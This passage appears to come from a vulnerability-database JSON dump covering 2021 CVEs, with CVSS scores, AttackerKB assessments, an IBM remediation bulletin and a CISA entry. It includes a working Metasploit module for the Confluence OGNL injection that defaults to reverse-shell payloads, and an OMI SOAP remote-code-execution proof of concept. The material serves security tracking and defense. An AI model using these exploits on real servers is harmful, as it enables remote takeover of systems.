['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n when :psh\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n #{target_shell},\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\n def target_shell\n target['Platform'] == 'win' ? '\"cmd.exe\",\"/c\"' : '\"/bin/sh\",\"-c\"'\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/atlassian_confluence_webwork_ognl_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2023-05-23T17:20:59", "description": "Open Management Infrastructure Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 15, 2021 4:37am UTC reported:\n\nRCE PoC using [`ExecuteScript`](<https://github.com/microsoft/SCXcore#runas-provider-executescript>) (multi-line shell script execution):\n \n \n wvu@kharak:~/Downloads$ curl -vs http://127.0.0.1:5985/wsman -H \"Content-Type: application/soap+xml\" -d @payload.xml | xmllint --format -\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 5985 (#0)\n > POST /wsman HTTP/1.1\n > Host: 127.0.0.1:5985\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/soap+xml\n > Content-Length: 1679\n > Expect: 100-continue\n >\n * Done waiting for 100-continue\n } [1679 bytes data]\n * We are completely uploaded and fine\n < HTTP/1.1 200 OK\n < Content-Length: 1393\n < Connection: Keep-Alive\n < Content-Type: application/soap+xml;charset=UTF-8\n <\n { [1393 bytes data]\n * Connection #0 to host 127.0.0.1 left intact\n * Closing connection 0\n <?xml version=\"1.0\"?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:wsen=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:e=\"http://schemas.xmlsoap.org/ws/2004/08/eventing\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:wsmb=\"http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd\" xmlns:wsman=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:wxf=\"http://schemas.xmlsoap.org/ws/2004/09/transfer\" xmlns:cim=\"http://schemas.dmtf.org/wbem/wscim/1/common\" xmlns:msftwinrm=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\" xmlns:wsmid=\"http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd\">\n <SOAP-ENV:Header>\n <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>\n <wsa:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</wsa:Action>\n <wsa:MessageID>uuid:19754ED3-CC01-0005-0000-000000010000</wsa:MessageID>\n <wsa:RelatesTo>uuid:00B60932-CC01-0005-0000-000000010000</wsa:RelatesTo>\n </SOAP-ENV:Header>\n <SOAP-ENV:Body>\n <p:SCX_OperatingSystem_OUTPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:ReturnValue>TRUE</p:ReturnValue>\n <p:ReturnCode>0</p:ReturnCode>\n <p:StdOut>\n Hello\n Goodbye\n </p:StdOut>\n <p:StdErr/>\n </p:SCX_OperatingSystem_OUTPUT>\n </SOAP-ENV:Body>\n </SOAP-ENV:Envelope>\n wvu@kharak:~/Downloads$\n \n\n`payload.xml`:\n \n \n <?xml version=\"1.0\"?>\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n \n\n[More context\u2026](<https://twitter.com/wvuuuuuuuuuuuuu/status/1438002644228968452>)\n\n**noraj** at March 31, 2022 8:33pm UTC reported:\n\nRCE PoC using [`ExecuteScript`](<https://github.com/microsoft/SCXcore#runas-provider-executescript>) (multi-line shell script execution):\n \n \n wvu@kharak:~/Downloads$ curl -vs http://127.0.0.1:5985/wsman -H \"Content-Type: application/soap+xml\" -d @payload.xml | xmllint --format -\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 5985 (#0)\n > POST /wsman HTTP/1.1\n > Host: 127.0.0.1:5985\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/soap+xml\n > Content-Length: 1679\n > Expect: 100-continue\n >\n * Done waiting for 100-continue\n } [1679 bytes data]\n * We are completely uploaded and fine\n < HTTP/1.1 200 OK\n < Content-Length: 1393\n < Connection: Keep-Alive\n < Content-Type: application/soap+xml;charset=UTF-8\n <\n { [1393 bytes data]\n * Connection #0 to host 127.0.0.1 left intact\n * Closing connection 0\n <?xml version=\"1.0\"?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:wsen=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:e=\"http://schemas.xmlsoap.org/ws/2004/08/eventing\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:wsmb=\"http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd\" xmlns:wsman=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:wxf=\"http://schemas.xmlsoap.org/ws/2004/09/transfer\" xmlns:cim=\"http://schemas.dmtf.org/wbem/wscim/1/common\" xmlns:msftwinrm=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\" xmlns:wsmid=\"http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd\">\n <SOAP-ENV:Header>\n <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>\n <wsa:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</wsa:Action>\n <wsa:MessageID>uuid:19754ED3-CC01-0005-0000-000000010000</wsa:MessageID>\n <wsa:RelatesTo>uuid:00B60932-CC01-0005-0000-000000010000</wsa:RelatesTo>\n </SOAP-ENV:Header>\n <SOAP-ENV:Body>\n <p:SCX_OperatingSystem_OUTPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:ReturnValue>TRUE</p:ReturnValue>\n <p:ReturnCode>0</p:ReturnCode>\n <p:StdOut>\n Hello\n Goodbye\n </p:StdOut>\n <p:StdErr/>\n </p:SCX_OperatingSystem_OUTPUT>\n </SOAP-ENV:Body>\n </SOAP-ENV:Envelope>\n wvu@kharak:~/Downloads$\n \n\n`payload.xml`:\n \n \n <?xml version=\"1.0\"?>\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n \n\n[More context\u2026](<https://twitter.com/wvuuuuuuuuuuuuu/status/1438002644228968452>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-38647", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-27T00:00:00", "id": "AKB:0802ECEE-BB4C-4C5B-969C-32CB9808C281", "href": "https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-13T20:50:58", "description": "An integer overflow was addressed with improved input validation. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-24T00:00:00", "type": "attackerkb", "title": "CVE-2021-30860", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30860"], "modified": "2021-09-15T00:00:00", "id": "AKB:A655707A-D5EC-4F21-AFEE-D9C97837C840", "href": "https://attackerkb.com/topics/sTaEOrsIns/cve-2021-30860", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T17:17:15", "description": "Microsoft MSHTML Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**JunquerGJ** at September 07, 2021 10:50pm UTC reported:\n\n * Vulnerable if default behaviour has been changed ( By default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office both of which prevent the current attack ) \n\n * Requires social engineering to be exploited \n\n * Workaround easy to deploy\n\n**ccondon-r7** at September 07, 2021 7:12pm UTC reported:\n\n * Vulnerable if default behaviour has been changed ( By default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office both of which prevent the current attack ) \n\n * Requires social engineering to be exploited \n\n * Workaround easy to deploy\n\n**nu11secur1ty** at September 22, 2021 4:28pm UTC reported:\n\n * Vulnerable if default behaviour has been changed ( By default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office both of which prevent the current attack ) \n\n * Requires social engineering to be exploited \n\n * Workaround easy to deploy\n\n**NinjaOperator** at September 07, 2021 6:45pm UTC reported:\n\n * Vulnerable if default behaviour has been changed ( By default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office both of which prevent the current attack ) \n\n * Requires social engineering to be exploited \n\n * Workaround easy to deploy\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-40444", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-25T00:00:00", "id": "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0", "href": "https://attackerkb.com/topics/6ojqzQoPox/cve-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-15T11:30:00", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if \u2018Allow people to sign up to create their account\u2019 is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 02, 2021 1:27am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**NinjaOperator** at September 01, 2021 5:38pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**GhostlaX** at September 04, 2021 1:44am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**Cherylyin** at September 03, 2021 2:03am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-26084 Confluence Server OGNL injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-04T00:00:00", "id": "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "href": "https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-19T15:02:59", "description": "Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-30632", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30632"], "modified": "2021-10-13T00:00:00", "id": "AKB:AC92E5DD-15E0-44E1-99A5-C1AED6D4703F", "href": "https://attackerkb.com/topics/LIR56M4ouS/cve-2021-30632", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-05-23T18:02:10", "description": "## Summary\n\nIBM QRadar Azure marketplace images include the Open Management Infrastructure RPM which is vulnerable to CVE-2021-38647. Although we do not expose the affected port, we suggest updating out of an abundance of caution.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-38647](<https://vulners.com/cve/CVE-2021-38647>) \n** DESCRIPTION: **Microsoft Azure Open Management Infrastructure could allow a remote attacker to execute arbitrary code on the system. By executing a specially-crafted program, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208548](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208548>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM QRadar Azure marketplace images 7.3.0 to 7.3.3 Patch 9\n\nIBM QRadar Azure marketplace images 7.4.0 to 7.4.3 Patch 2\n\n \n\n\n## Remediation/Fixes\n \n \n 1. Check your current version of OMI to see if you are affected. All versions of OMI below v1.6.8-1 are affected\n To do this perform the following command:\n yum list all | grep omi\n \n 2. Add Microsoft Software Repository for RHEL 7 Linux Platform:\n sudo yum localinstall <https://packages.microsoft.com/config/rhel/7/packages-microsoft-prod.rpm>\n \n 3. Run yum update command for OMI:\n sudo yum update omi\n \n 4. Disable Microsoft Software Repository after updating the rpm \n sudo sed -i 's/^enabled=1/enabled=0/' /etc/yum.repos.d/microsoft-prod.repo \n \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-30T15:02:10", "type": "ibm", "title": "Security Bulletin: IBM QRadar Azure marketplace images include Open Management Infrastructure RPM, which is vulnerable to Remote Code Execution (CVE-2021-38647)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-30T15:02:10", "id": "1E405D4974F6EA8AB73C7DDA9E9B3B2FCA2359AF05B6CF7C124046402F2BC520", "href": "https://www.ibm.com/support/pages/node/6491159", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Open Management Infrastructure (OMI) within Azure VM Management Extensions contains an unspecified vulnerability allowing remote code execution.", 